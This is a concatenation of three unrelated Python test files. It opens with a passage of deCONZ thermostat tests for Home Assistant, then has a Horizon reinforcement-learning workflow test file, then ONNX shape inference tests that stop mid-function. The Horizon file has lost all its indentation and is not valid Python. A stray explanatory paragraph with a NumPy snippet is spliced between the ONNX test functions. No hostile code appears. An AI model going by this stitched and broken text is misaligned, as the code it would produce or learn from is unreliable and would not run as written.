        {ATTR_ENTITY_ID: "climate.thermostat", ATTR_HVAC_MODE: HVAC_MODE_HEAT},
        blocking=True,
    )
    assert aioclient_mock.mock_calls[2][2] == {"mode": "heat"}

    # Service set HVAC mode to off
    await hass.services.async_call(
        CLIMATE_DOMAIN,
        SERVICE_SET_HVAC_MODE,
        {ATTR_ENTITY_ID: "climate.thermostat", ATTR_HVAC_MODE: HVAC_MODE_OFF},
        blocking=True,
    )
    assert aioclient_mock.mock_calls[3][2] == {"mode": "off"}

    # Service set HVAC mode to unsupported value
    with pytest.raises(ValueError):
        await hass.services.async_call(
            CLIMATE_DOMAIN,
            SERVICE_SET_HVAC_MODE,
            {ATTR_ENTITY_ID: "climate.thermostat", ATTR_HVAC_MODE: HVAC_MODE_COOL},
            blocking=True,
        )

    # Service set temperature to 20
    await hass.services.async_call(
        CLIMATE_DOMAIN,
        SERVICE_SET_TEMPERATURE,
        {ATTR_ENTITY_ID: "climate.thermostat", ATTR_TEMPERATURE: 20},
        blocking=True,
    )
    assert aioclient_mock.mock_calls[4][2] == {"heatsetpoint": 2000.0}

    # Service set temperature without providing temperature attribute
    with pytest.raises(ValueError):
        await hass.services.async_call(
            CLIMATE_DOMAIN,
            SERVICE_SET_TEMPERATURE,
            {
                ATTR_ENTITY_ID: "climate.thermostat",
                ATTR_TARGET_TEMP_HIGH: 30,
                ATTR_TARGET_TEMP_LOW: 10,
            },
            blocking=True,
        )

    await hass.config_entries.async_unload(config_entry.entry_id)

    states = hass.states.async_all()
    assert len(hass.states.async_all()) == 2
    for state in states:
        assert state.state == STATE_UNAVAILABLE

    await hass.config_entries.async_remove(config_entry.entry_id)
    await hass.async_block_till_done()
    assert len(hass.states.async_all()) == 0

async def test_climate_device_with_cooling_support(hass, aioclient_mock):
    """Test successful creation of sensor entities."""
    data = deepcopy(DECONZ_WEB_REQUEST)
    data["sensors"] = {
        "0": {
            "config": {
                "battery": 25,
                "coolsetpoint": None,
                "fanmode": None,
                "heatsetpoint": 2222,
                "mode": "heat",
                "offset": 0,
                "on": True,
                "reachable": True,
            },
            "ep": 1,
            "etag": "074549903686a77a12ef0f06c499b1ef",
            "lastseen": "2020-11-27T13:45Z",
            "manufacturername": "Zen Within",
            "modelid": "Zen-01",
            "name": "Zen-01",
            "state": {
                "lastupdated": "2020-11-27T13:42:40.863",
                "on": False,
                "temperature": 2320,
            },
            "type": "ZHAThermostat",
            "uniqueid": "00:24:46:00:00:11:6f:56-01-0201",
        }
    }
    config_entry = await setup_deconz_integration(
        hass, aioclient_mock, get_state_response=data
    )
    gateway = get_gateway_from_config_entry(hass, config_entry)

    assert len(hass.states.async_all()) == 2
    climate_thermostat = hass.states.get("climate.zen_01")
    assert climate_thermostat.state == HVAC_MODE_HEAT
    assert climate_thermostat.attributes["hvac_modes"] == [
        HVAC_MODE_AUTO,
        HVAC_MODE_COOL,
        HVAC_MODE_HEAT,
        HVAC_MODE_OFF,
    ]
    assert climate_thermostat.attributes["current_temperature"] == 23.2
    assert climate_thermostat.attributes["temperature"] == 22.2
    assert hass.states.get("sensor.zen_01_battery_level").state == "25"

    # Event signals thermostat state cool
    state_changed_event = {
        "t": "event",
        "e": "changed",
        "r": "sensors",
        "id": "0",
        "config": {"mode": "cool"},
    }
    gateway.api.event_handler(state_changed_event)
    await hass.async_block_till_done()

    assert hass.states.get("climate.zen_01").state == HVAC_MODE_COOL

    # Verify service calls
    mock_deconz_put_request(aioclient_mock, config_entry.data, "/sensors/0/config")

    # Service set temperature to 20
    await hass.services.async_call(
        CLIMATE_DOMAIN,
        SERVICE_SET_TEMPERATURE,
        {ATTR_ENTITY_ID: "climate.zen_01", ATTR_TEMPERATURE: 20},
        blocking=True,
    )
    assert aioclient_mock.mock_calls[1][2] == {"coolsetpoint": 2000.0}

async def test_climate_device_with_fan_support(hass, aioclient_mock):
    """Test successful creation of sensor entities."""
    data = deepcopy(DECONZ_WEB_REQUEST)
    data["sensors"] = {
        "0": {
            "config": {
                "battery": 25,
                "coolsetpoint": None,
                "fanmode": "auto",
                "heatsetpoint": 2222,
                "mode": "heat",
                "offset": 0,
                "on": True,
                "reachable": True,
            },
            "ep": 1,
            "etag": "074549903686a77a12ef0f06c499b1ef",
            "lastseen": "2020-11-27T13:45Z",
            "manufacturername": "Zen Within",
            "modelid": "Zen-01",
            "name": "Zen-01",
            "state": {
                "lastupdated": "2020-11-27T13:42:40.863",
                "on": False,
                "temperature": 2320,
            },
            "type": "ZHAThermostat",
            "uniqueid": "00:24:46:00:00:11:6f:56-01-0201",
        }
    }
    config_entry = await setup_deconz_integration(
        hass, aioclient_mock, get_state_response=data
    )
    gateway = get_gateway_from_config_entry(hass, config_entry)

    assert len(hass.states.async_all()) == 2
    climate_thermostat = hass.states.get("climate.zen_01")
    assert climate_thermostat.state == HVAC_MODE_HEAT
    assert climate_thermostat.attributes["fan_mode"] == FAN_AUTO
    assert climate_thermostat.attributes["fan_modes"] == [
        DECONZ_FAN_SMART,
        FAN_AUTO,
        FAN_HIGH,
        FAN_MEDIUM,
        FAN_LOW,
        FAN_ON,
        FAN_OFF,
    ]

    # Event signals fan mode defaults to off
    state_changed_event = {
        "t": "event",
        "e": "changed",
        "r": "sensors",
        "id": "0",
        "config": {"fanmode": "unsupported"},
    }
    gateway.api.event_handler(state_changed_event)
    await hass.async_block_till_done()

    assert hass.states.get("climate.zen_01").attributes["fan_mode"] == FAN_OFF

    # Event signals unsupported fan mode
    state_changed_event = {
        "t": "event",
        "e": "changed",
        "r": "sensors",
        "id": "0",
        "config": {"fanmode": "unsupported"},
        "state": {"on": True},
    }
    gateway.api.event_handler(state_changed_event)
    await hass.async_block_till_done()

    assert hass.states.get("climate.zen_01").attributes["fan_mode"] == FAN_ON

    # Event signals unsupported fan mode
    state_changed_event = {
        "t": "event",
        "e": "changed",
        "r": "sensors",
        "id": "0",
        "config": {"fanmode": "unsupported"},
    }
    gateway.api.event_handler(state_changed_event)
    await hass.async_block_till_done()

    assert hass.states.get("climate.zen_01").attributes["fan_mode"] == FAN_ON

    # Verify service calls
    mock_deconz_put_request(aioclient_mock, config_entry.data, "/sensors/0/config")

    # Service set fan mode to off
    await hass.services.async_call(
        CLIMATE_DOMAIN,
        SERVICE_SET_FAN_MODE,
        {ATTR_ENTITY_ID: "climate.zen_01", ATTR_FAN_MODE: FAN_OFF},
        blocking=True,
    )
    assert aioclient_mock.mock_calls[1][2] == {"fanmode": "off"}

    # Service set fan mode to custom deCONZ mode smart
    await hass.services.async_call(
        CLIMATE_DOMAIN,
        SERVICE_SET_FAN_MODE,
        {ATTR_ENTITY_ID: "climate.zen_01", ATTR_FAN_MODE: DECONZ_FAN_SMART},
        blocking=True,
    )
    assert aioclient_mock.mock_calls[2][2] == {"fanmode": "smart"}

    # Service set fan mode to unsupported value
    with pytest.raises(ValueError):
        await hass.services.async_call(
            CLIMATE_DOMAIN,
            SERVICE_SET_FAN_MODE,
            {ATTR_ENTITY_ID: "climate.zen_01", ATTR_FAN_MODE: "unsupported"},
            blocking=True,
        )



async def test_climate_device_with_preset(hass, aioclient_mock):
    """Test successful creation of climate entities with preset support."""
    data = deepcopy(DECONZ_WEB_REQUEST)
    data["sensors"] = {
        "0": {
            "config": {
                "battery": 25,
                "coolsetpoint": None,
                "fanmode": None,
                "heatsetpoint": 2222,
                "mode": "heat",
                "preset": "auto",
                "offset": 0,
                "on": True,
                "reachable": True,
            },
            "ep": 1,
            "etag": "074549903686a77a12ef0f06c499b1ef",
            "lastseen": "2020-11-27T13:45Z",
            "manufacturername": "Zen Within",
            "modelid": "Zen-01",
            "name": "Zen-01",
            "state": {
                "lastupdated": "2020-11-27T13:42:40.863",
                "on": False,
                "temperature": 2320,
            },
            "type": "ZHAThermostat",
            "uniqueid": "00:24:46:00:00:11:6f:56-01-0201",
        }
    }
    config_entry = await setup_deconz_integration(
        hass, aioclient_mock, get_state_response=data
    )
    gateway = get_gateway_from_config_entry(hass, config_entry)

    assert len(hass.states.async_all()) == 2

    climate_zen_01 = hass.states.get("climate.zen_01")
    assert climate_zen_01.state == HVAC_MODE_HEAT
    assert climate_zen_01.attributes["current_temperature"] == 23.2
    assert climate_zen_01.attributes["temperature"] == 22.2
    assert climate_zen_01.attributes["preset_mode"] == "auto"
    assert climate_zen_01.attributes["preset_modes"] == [
        "auto",
        "boost",
        "comfort",
        "complex",
        "eco",
        "holiday",
        "manual",
    ]

    # Event signals deCONZ preset
    state_changed_event = {
        "t": "event",
        "e": "changed",
        "r": "sensors",
        "id": "0",
        "config": {"preset": "manual"},
    }
    gateway.api.event_handler(state_changed_event)
    await hass.async_block_till_done()

    assert (
        hass.states.get("climate.zen_01").attributes["preset_mode"]
        == DECONZ_PRESET_MANUAL
    )

    # Event signals unknown preset
    state_changed_event = {
        "t": "event",
        "e": "changed",
        "r": "sensors",
        "id": "0",
        "config": {"preset": "unsupported"},
    }
    gateway.api.event_handler(state_changed_event)
    await hass.async_block_till_done()

    assert hass.states.get("climate.zen_01").attributes["preset_mode"] is None

    # Verify service calls
    mock_deconz_put_request(aioclient_mock, config_entry.data, "/sensors/0/config")

    # Service set preset to HASS preset
    await hass.services.async_call(
        CLIMATE_DOMAIN,
        SERVICE_SET_PRESET_MODE,
        {ATTR_ENTITY_ID: "climate.zen_01", ATTR_PRESET_MODE: PRESET_COMFORT},
        blocking=True,
    )
    assert aioclient_mock.mock_calls[1][2] == {"preset": "comfort"}

    # Service set preset to custom deCONZ preset
    await hass.services.async_call(
        CLIMATE_DOMAIN,
        SERVICE_SET_PRESET_MODE,
        {ATTR_ENTITY_ID: "climate.zen_01", ATTR_PRESET_MODE: DECONZ_PRESET_MANUAL},
        blocking=True,
    )
    assert aioclient_mock.mock_calls[2][2] == {"preset": "manual"}

    # Service set preset to unsupported value
    with pytest.raises(ValueError):
        await hass.services.async_call(
            CLIMATE_DOMAIN,
            SERVICE_SET_PRESET_MODE,
            {ATTR_ENTITY_ID: "climate.zen_01", ATTR_PRESET_MODE: "unsupported"},
            blocking=True,
        )


async def test_clip_climate_device(hass, aioclient_mock):
    """Test successful creation of CLIP climate entities."""
    data = deepcopy(DECONZ_WEB_REQUEST)
    data["sensors"] = deepcopy(SENSORS)
    config_entry = await setup_deconz_integration(
        hass,
        aioclient_mock,
        options={CONF_ALLOW_CLIP_SENSOR: True},
        get_state_response=data,
    )

    assert len(hass.states.async_all()) == 3
    assert hass.states.get("climate.thermostat").state == HVAC_MODE_AUTO
    assert hass.states.get("sensor.thermostat") is None
    assert hass.states.get("sensor.thermostat_battery_level").state == "100"
    assert hass.states.get("climate.clip_thermostat").state == HVAC_MODE_HEAT

    # Disallow clip sensors
    hass.config_entries.async_update_entry(
        config_entry, options={CONF_ALLOW_CLIP_SENSOR: False}
    )
    await hass.async_block_till_done()

    assert len(hass.states.async_all()) == 2
    assert hass.states.get("climate.clip_thermostat") is None

    # Allow clip sensors
    hass.config_entries.async_update_entry(
        config_entry, options={CONF_ALLOW_CLIP_SENSOR: True}
    )
    await hass.async_block_till_done()

    assert len(hass.states.async_all()) == 3
    assert hass.states.get("climate.clip_thermostat").state == HVAC_MODE_HEAT


async def test_verify_state_update(hass, aioclient_mock):
    """Test that state updates properly."""
    data = deepcopy(DECONZ_WEB_REQUEST)
    data["sensors"] = deepcopy(SENSORS)
    config_entry = await setup_deconz_integration(
        hass, aioclient_mock, get_state_response=data
    )
    gateway = get_gateway_from_config_entry(hass, config_entry)

    assert hass.states.get("climate.thermostat").state == HVAC_MODE_AUTO

    state_changed_event = {
        "t": "event",
        "e": "changed",
        "r": "sensors",
        "id": "1",
        "state": {"on": False},
    }
    gateway.api.event_handler(state_changed_event)
    await hass.async_block_till_done()

    assert hass.states.get("climate.thermostat").state == HVAC_MODE_AUTO
    assert gateway.api.sensors["1"].changed_keys == {"state", "r", "t", "on", "e", "id"}


async def test_add_new_climate_device(hass, aioclient_mock):
    """Test that adding a new climate device works."""
    config_entry = await setup_deconz_integration(hass, aioclient_mock)
    gateway = get_gateway_from_config_entry(hass, config_entry)
    assert len(hass.states.async_all()) == 0

    state_added_event = {
        "t": "event",
        "e": "added",
        "r": "sensors",
        "id": "1",
        "sensor": deepcopy(SENSORS["1"]),
    }
    gateway.api.event_handler(state_added_event)
    await hass.async_block_till_done()

    assert len(hass.states.async_all()) == 2
    assert hass.states.get("climate.thermostat").state == HVAC_MODE_AUTO
    assert hass.states.get("sensor.thermostat_battery_level").state == "100"


# --- Source: ml/rl/test/workflow/test_oss_workflows.py (roamiri/Horizon, BSD-3-Clause) ---
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
import os
import tempfile
import unittest
import torch
from ml.rl.tensorboardX import SummaryWriterContext
from ml.rl.training.dqn_predictor import DQNPredictor
from ml.rl.workflow import ddpg_workflow, dqn_workflow, parametric_dqn_workflow
curr_dir = os.path.dirname(__file__)
class TestOSSWorkflows(unittest.TestCase):
def setUp(self):
SummaryWriterContext._reset_globals()
def tearDown(self):
SummaryWriterContext._reset_globals()
def _test_dqn_workflow(self, use_gpu=False, use_all_avail_gpus=False):
"""Run DQN workflow to ensure no crashes, algorithm correctness
not tested here."""
with tempfile.TemporaryDirectory() as tmpdirname:
params = {
"training_data_path": os.path.join(
curr_dir, "test_data/discrete_action/cartpole_training.json.bz2"
),
"eval_data_path": os.path.join(
curr_dir, "test_data/discrete_action/cartpole_eval.json.bz2"
),
"state_norm_data_path": os.path.join(
curr_dir, "test_data/discrete_action/cartpole_norm.json"
),
"model_output_path": tmpdirname,
"use_gpu": use_gpu,
"use_all_avail_gpus": use_all_avail_gpus,
"actions": ["0", "1"],
"epochs": 1,
"rl": {},
"rainbow": {},
"training": {"minibatch_size": 1024},
}
predictor = dqn_workflow.train_network(params)
test_float_state_features = [{"0": 1.0, "1": 1.0, "2": 1.0, "3": 1.0}]
q_values = predictor.predict(test_float_state_features)
assert len(q_values[0].keys()) == 2
def test_dqn_workflow(self):
self._test_dqn_workflow()
@unittest.skipIf(not torch.cuda.is_available(), "CUDA not available")
def test_dqn_workflow_gpu(self):
self._test_dqn_workflow(use_gpu=True)
@unittest.skipIf(not torch.cuda.is_available(), "CUDA not available")
def test_dqn_workflow_all_gpus(self):
self._test_dqn_workflow(use_gpu=True, use_all_avail_gpus=True)
def _test_parametric_dqn_workflow(self, use_gpu=False, use_all_avail_gpus=False):
"""Run Parametric DQN workflow to ensure no crashes, algorithm correctness
not tested here."""
with tempfile.TemporaryDirectory() as tmpdirname:
params = {
"training_data_path": os.path.join(
curr_dir, "test_data/parametric_action/cartpole_training.json.bz2"
),
"eval_data_path": os.path.join(
curr_dir, "test_data/parametric_action/cartpole_eval.json.bz2"
),
"state_norm_data_path": os.path.join(
curr_dir, "test_data/parametric_action/state_features_norm.json"
),
"action_norm_data_path": os.path.join(
curr_dir, "test_data/parametric_action/action_norm.json"
),
"model_output_path": tmpdirname,
"use_gpu": use_gpu,
"use_all_avail_gpus": use_all_avail_gpus,
"epochs": 1,
"rl": {},
"rainbow": {},
"training": {"minibatch_size": 1024},
}
predictor = parametric_dqn_workflow.train_network(params)
test_float_state_features = [{"0": 1.0, "1": 1.0, "2": 1.0, "3": 1.0}]
test_int_state_features = [{}]
test_action_features = [{"4": 0.0, "5": 1.0}]
q_values = predictor.predict(
test_float_state_features, test_int_state_features, test_action_features
)
assert len(q_values[0].keys()) == 1
def test_parametric_dqn_workflow(self):
self._test_parametric_dqn_workflow()
@unittest.skipIf(not torch.cuda.is_available(), "CUDA not available")
def test_parametric_dqn_workflow_gpu(self):
self._test_parametric_dqn_workflow(use_gpu=True)
@unittest.skipIf(not torch.cuda.is_available(), "CUDA not available")
def test_parametric_dqn_workflow_all_gpus(self):
self._test_parametric_dqn_workflow(use_gpu=True, use_all_avail_gpus=True)
def _test_ddpg_workflow(self, use_gpu=False, use_all_avail_gpus=False):
"""Run DDPG workflow to ensure no crashes, algorithm correctness
not tested here."""
with tempfile.TemporaryDirectory() as tmpdirname:
params = {
"training_data_path": os.path.join(
curr_dir, "test_data/continuous_action/pendulum_training.json.bz2"
),
"eval_data_path": os.path.join(
curr_dir, "test_data/continuous_action/pendulum_eval.json.bz2"
),
"state_norm_data_path": os.path.join(
curr_dir, "test_data/continuous_action/state_features_norm.json"
),
"action_norm_data_path": os.path.join(
curr_dir, "test_data/continuous_action/action_norm.json"
),
"model_output_path": tmpdirname,
"use_gpu": use_gpu,
"use_all_avail_gpus": use_all_avail_gpus,
"epochs": 1,
"rl": {},
"rainbow": {},
"shared_training": {"minibatch_size": 1024},
"actor_training": {},
"critic_training": {},
}
predictor = ddpg_workflow.train_network(params)
test_float_state_features = [{"0": 1.0, "1": 1.0, "2": 1.0, "3": 1.0}]
test_int_state_features = [{}]
action = predictor.actor_prediction(
test_float_state_features, test_int_state_features
)
assert len(action) == 1
def test_ddpg_workflow(self):
self._test_ddpg_workflow()
@unittest.skipIf(not torch.cuda.is_available(), "CUDA not available")
def test_ddpg_workflow_gpu(self):
self._test_ddpg_workflow(use_gpu=True)
@unittest.skipIf(not torch.cuda.is_available(), "CUDA not available")
def test_ddpg_workflow_all_gpus(self):
self._test_ddpg_workflow(use_gpu=True, use_all_avail_gpus=True)
def test_read_c2_model_from_file(self):
"""Test reading output caffe2 model from file and using it for inference."""
path = os.path.join(curr_dir, "test_data/discrete_action/example_predictor.c2")
predictor = DQNPredictor.load(path, "minidb", int_features=False)
test_float_state_features = [{"0": 1.0, "1": 1.0, "2": 1.0, "3": 1.0}]
q_values = predictor.predict(test_float_state_features)
assert len(q_values[0].keys()) == 2


# --- Source: onnx/test/shape_inference_test.py (onnx, Apache-2.0) ---
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from onnx import checker, helper, TensorProto, NodeProto, GraphProto, ValueInfoProto, ModelProto, ONNX_ML, SparseTensorProto
from onnx.defs import ONNX_DOMAIN, ONNX_ML_DOMAIN, AI_ONNX_PREVIEW_TRAINING_DOMAIN
from onnx.helper import make_node, make_tensor, make_tensor_value_info, make_empty_tensor_value_info, make_opsetid, make_sequence_value_info
from typing import Sequence, Union, Text, Tuple, List, Any, Optional
import onnx.shape_inference
import unittest
import os
import numpy as np # type: ignore
class TestShapeInference(unittest.TestCase):
def _make_graph(self,
seed_values, # type: Sequence[Union[Text, Tuple[Text, TensorProto.DataType, Any]]]
nodes, # type: List[NodeProto]
value_info, # type: List[ValueInfoProto]
initializer=None # type: Optional[Sequence[TensorProto]]
): # type: (...) -> GraphProto
if initializer is None:
initializer = []
names_in_initializer = set(x.name for x in initializer)
input_value_infos = []
# If the starting values are not also initializers,
# introduce the starting values as the output of reshape,
# so that the sizes are guaranteed to be unknown
for seed_value in seed_values:
if isinstance(seed_value, tuple):
seed_name, proto_type = seed_value[:2]
seed_value_info = make_tensor_value_info(*seed_value)
else:
seed_name, proto_type = seed_value, TensorProto.UNDEFINED
seed_value_info = make_empty_tensor_value_info(seed_value)
if seed_name in names_in_initializer:
input_value_infos.append(seed_value_info)
else:
value_info.append(seed_value_info)
input_value_infos.append(make_tensor_value_info('SEED_' + seed_name, proto_type, ()))
input_value_infos.append(make_tensor_value_info('UNKNOWN_SHAPE_' + seed_name, TensorProto.INT64, ()))
nodes[:0] = [make_node("Reshape", ['SEED_' + seed_name, 'UNKNOWN_SHAPE_' + seed_name], [seed_name])]
return helper.make_graph(nodes, "test", input_value_infos, [], initializer=initializer, value_info=value_info)
def _inferred(self, graph, **kwargs): # type: (GraphProto, **Any) -> ModelProto
kwargs[str('producer_name')] = 'onnx-test'
orig_model = helper.make_model(graph, **kwargs)
inferred_model = onnx.shape_inference.infer_shapes(orig_model, strict_mode=True)
checker.check_model(inferred_model)
return inferred_model
def _assert_inferred(self, graph, vis, **kwargs): # type: (GraphProto, List[ValueInfoProto], **Any) -> None
names_in_vis = set(x.name for x in vis)
vis = list(x for x in graph.value_info if x.name not in names_in_vis) + vis
inferred_model = self._inferred(graph, **kwargs)
inferred_vis = list(inferred_model.graph.value_info)
vis = list(sorted(vis, key=lambda x: x.name))
inferred_vis = list(sorted(inferred_vis, key=lambda x: x.name))
if vis == inferred_vis:
return
# otherwise some custom logic to give a nicer diff
vis_names = set(x.name for x in vis)
inferred_vis_names = set(x.name for x in inferred_vis)
assert vis_names == inferred_vis_names, (vis_names, inferred_vis_names)
for vi, inferred_vi in zip(vis, inferred_vis):
assert vi == inferred_vi, '\n%s\n%s\n' % (vi, inferred_vi)
assert False
    def test_empty_graph(self):  # type: () -> None
        graph = self._make_graph(
            ['y'],
            [], [])
        self.assertRaises(onnx.shape_inference.InferenceError, self._inferred, graph)

    def _identity_prop(self, op, **kwargs):  # type: (Text, **Any) -> None
        graph = self._make_graph(
            [('x', TensorProto.FLOAT, (30, 4, 5))],
            [make_node(op, 'x', 'y', **kwargs)],
            [])
        self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (30, 4, 5))])

    def test_transpose(self):  # type: () -> None
        graph = self._make_graph(
            [("X", TensorProto.FLOAT, (2, 3, 4))],
            [make_node("Transpose", ["X"], ["Y"], perm=[1, 0, 2])],
            [])
        self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (3, 2, 4))])

    def test_transpose_preexisting(self):  # type: () -> None
        graph = self._make_graph(
            [("X", TensorProto.FLOAT, (2, 3, 4))],
            [make_node("Transpose", ["X"], ["Y"], perm=[1, 0, 2])],
            [make_tensor_value_info("Y", TensorProto.FLOAT, None)])
        self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (3, 2, 4))])

    def test_transpose_partial(self):  # type: () -> None
        graph = self._make_graph(
            [("X", TensorProto.FLOAT, (2, 3, 4))],
            [make_node("Transpose", ["X"], ["Y"], perm=[1, 0, 2])],
            [make_tensor_value_info("Y", TensorProto.UNDEFINED, (3, "a", "b"))])  # type: ignore
        self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (3, 2, 4))])

    def test_transpose_preexisting_incorrect_shape(self):  # type: () -> None
        graph = self._make_graph(
            [("X", TensorProto.FLOAT, (2, 3, 4))],
            [make_node("Transpose", ["X"], ["Y"], perm=[1, 0, 2])],
            [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 5, 5))])
        self.assertRaises(onnx.shape_inference.InferenceError, self._inferred, graph)

    def test_transpose_preexisting_incorrect_type(self):  # type: () -> None
        graph = self._make_graph(
            [("X", TensorProto.FLOAT, (2, 3, 4))],
            [make_node("Transpose", ["X"], ["Y"], perm=[1, 0, 2])],
            [make_tensor_value_info("Y", TensorProto.STRING, (3, 2, 4))])
        self.assertRaises(onnx.shape_inference.InferenceError, self._inferred, graph)

    def _make_matmul_test_all_dims_known(self, shape1, shape2):  # type: (Sequence[int], Sequence[int]) -> None
        expected_out_shape = np.matmul(np.arange(np.product(shape1)).reshape(shape1),
                                       np.arange(np.product(shape2)).reshape(shape2)).shape
        graph = self._make_graph(
            [('x', TensorProto.FLOAT, shape1),
             ('y', TensorProto.FLOAT, shape2)],
            [make_node('MatMul', ['x', 'y'], ['z'])],
            [])
        self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, expected_out_shape)])

    def test_matmul_all_dims_known(self):  # type: () -> None
        self._make_matmul_test_all_dims_known((2,), (2,))
        self._make_matmul_test_all_dims_known((4, 2), (2, 4))
        self._make_matmul_test_all_dims_known((5, 2), (2, 4))
        self._make_matmul_test_all_dims_known((5, 2), (2, 1))
        self._make_matmul_test_all_dims_known((1, 2), (2, 3))
        self._make_matmul_test_all_dims_known((2,), (2, 3))
        self._make_matmul_test_all_dims_known((4, 2), (2,))
        self._make_matmul_test_all_dims_known((1, 4, 2), (3, 2, 3))
        self._make_matmul_test_all_dims_known((3, 4, 2), (3, 2, 3))
        self._make_matmul_test_all_dims_known((5, 1, 4, 2), (1, 3, 2, 3))
        self._make_matmul_test_all_dims_known((4, 2), (3, 2, 3))

    def _make_matmul_test_allow_unknown(self, shape1, shape2, expected_out_shape):  # type: (Any, Any, Any) -> None
        graph = self._make_graph(
            [('x', TensorProto.FLOAT, shape1),
             ('y', TensorProto.FLOAT, shape2)],
            [make_node('MatMul', ['x', 'y'], ['z'])],
            [])
        self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, expected_out_shape)])

    def test_matmul_allow_unknown(self):  # type: () -> None
        self._make_matmul_test_allow_unknown((None,), (None,), ())
        self._make_matmul_test_allow_unknown((3,), (None,), ())
        self._make_matmul_test_allow_unknown((2,), (2, "a"), ("a",))
        self._make_matmul_test_allow_unknown((4, 2), (2, "a"), (4, "a"))
        self._make_matmul_test_allow_unknown((4, None), (2, "a"), (4, "a"))
        self._make_matmul_test_allow_unknown((4, None), (None, "a"), (4, "a"))
        self._make_matmul_test_allow_unknown((1, 4, 2), ("a", 2, 5), ("a", 4, 5))
        self._make_matmul_test_allow_unknown((1, 3, 4, 2), ("a", 2, 5), (1, 3, 4, 5))
        self._make_matmul_test_allow_unknown((3,), None, None)
        self._make_matmul_test_allow_unknown(None, None, None)
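The expected shapes in `_make_matmul_test_all_dims_known` above come straight from NumPy's matmul semantics: the leading (batch) dimensions broadcast against each other, while the trailing two dimensions follow matrix-multiplication rules. A minimal standalone sketch of that rule, independent of ONNX:

```python
import numpy as np

# Shape-only check of np.matmul broadcasting: batch dims (5, 1) and (1, 3)
# broadcast to (5, 3); the matrix dims (4, 2) @ (2, 3) give (4, 3).
a = np.zeros((5, 1, 4, 2))
b = np.zeros((1, 3, 2, 3))
out = np.matmul(a, b)
print(out.shape)  # (5, 3, 4, 3)
```

This mirrors the `(5, 1, 4, 2) x (1, 3, 2, 3)` case exercised in `test_matmul_all_dims_known`.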
    def test_cast(self):  # type: () -> None
        graph = self._make_graph(
            [("x", TensorProto.FLOAT, (2, 4, 3))],
            [make_node("Cast", ["x"], ["y"], to=TensorProto.UINT8)],
            [])
        self._assert_inferred(graph, [make_tensor_value_info("y", TensorProto.UINT8, (2, 4, 3))])

    def test_concat(self):  # type: () -> None
        graph = self._make_graph(
            [("x", TensorProto.FLOAT, (2, 4, 3)),
             ("y", TensorProto.FLOAT, (7, 4, 3))],
            [make_node("Concat", ['x', 'y'], ['z'], axis=0)],
            [])
        self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (9, 4, 3))])

    def test_concat_missing_shape(self):  # type: () -> None
        graph = self._make_graph(
            [("x", TensorProto.FLOAT, (2, 4, 3)),
             "y",
             ("z", TensorProto.FLOAT, (None, None, None))],
            [make_node("Concat", ['x', 'y', 'z'], ['out'], axis=0)],
            [])
        self.assertRaises(onnx.shape_inference.InferenceError, self._inferred, graph)

    def test_concat_3d_axis_2(self):  # type: () -> None
        graph = self._make_graph(
            [('x', TensorProto.FLOAT, (2, 2, 2)),
             ('y', TensorProto.FLOAT, (2, 2, 2))],
            [make_node('Concat', ['x', 'y'], ['z'], axis=2)],
            [])
        self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (2, 2, 4))])

    def test_concat_param(self):  # type: () -> None
        graph = self._make_graph(
            [("x", TensorProto.FLOAT, ("a", 2)),
             ("y", TensorProto.FLOAT, ("a", 3))],
            [make_node("Concat", ['x', 'y'], ['z'], axis=1)],
            [])
        self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, ("a", 5))])

    def test_concat_param_single_input(self):  # type: () -> None
        graph = self._make_graph(
            [("x", TensorProto.FLOAT, ("a", 2))],
            [make_node("Concat", ['x'], ['z'], axis=0)],
            [])
        self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, ("a", 2))])

    def test_reshape_dynamic_shape(self):  # type: () -> None
        graph = self._make_graph(
            [('x', TensorProto.UINT8, (2, 4, 3)),
             ('shape', TensorProto.INT64, (2,))],
            [make_node("Reshape", ['x', 'shape'], ['y'])],
            [])
        self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.UINT8, None)])

    def test_reshape_static_shape(self):  # type: () -> None
        graph = self._make_graph(
            [('x', TensorProto.UINT8, (2, 4, 3)),
             ('shape', TensorProto.INT64, (2,))],
            [make_node("Reshape", ['x', 'shape'], ['y'])],
            [],
            initializer=[make_tensor('shape', TensorProto.INT64, (2,), (3, 8))])
        self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.UINT8, (3, 8))])

    def test_reshape_static_shape_inferred(self):  # type: () -> None
        graph = self._make_graph(
            [('x', TensorProto.UINT8, (2, 4, 3)),
             ('shape', TensorProto.INT64, (3,))],
            [make_node("Reshape", ['x', 'shape'], ['y'])],
            [],
            initializer=[make_tensor('shape', TensorProto.INT64, (3,), (0, 3, -1))])
        self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.UINT8, (2, 3, 4))])

    def test_reshape_static_shape_zero(self):  # type: () -> None
        graph = self._make_graph(
            [('x', TensorProto.UINT8, (1, 1, 1)),
             ('shape', TensorProto.INT64, (3,))],
            [make_node("Reshape", ['x', 'shape'], ['y'])],
            [],
            initializer=[make_tensor('shape', TensorProto.INT64, (3,), (0, 1, 1))])
        self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.UINT8, (1, 1, 1))])

    def test_reshape_static_shape_allowzero(self):  # type: () -> None
        graph = self._make_graph(
            [('x', TensorProto.UINT8, (1, 0, 0)),
             ('shape', TensorProto.INT64, (3,))],
            [make_node("Reshape", ['x', 'shape'], ['y'], allowzero=1)],
            [],
            initializer=[make_tensor('shape', TensorProto.INT64, (3,), (0, 1, 1))])
        self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.UINT8, (0, 1, 1))])

    def test_reshape_static_shape_constant(self):  # type: () -> None
        graph = self._make_graph(
            [('x', TensorProto.UINT8, (2, 4, 3))],
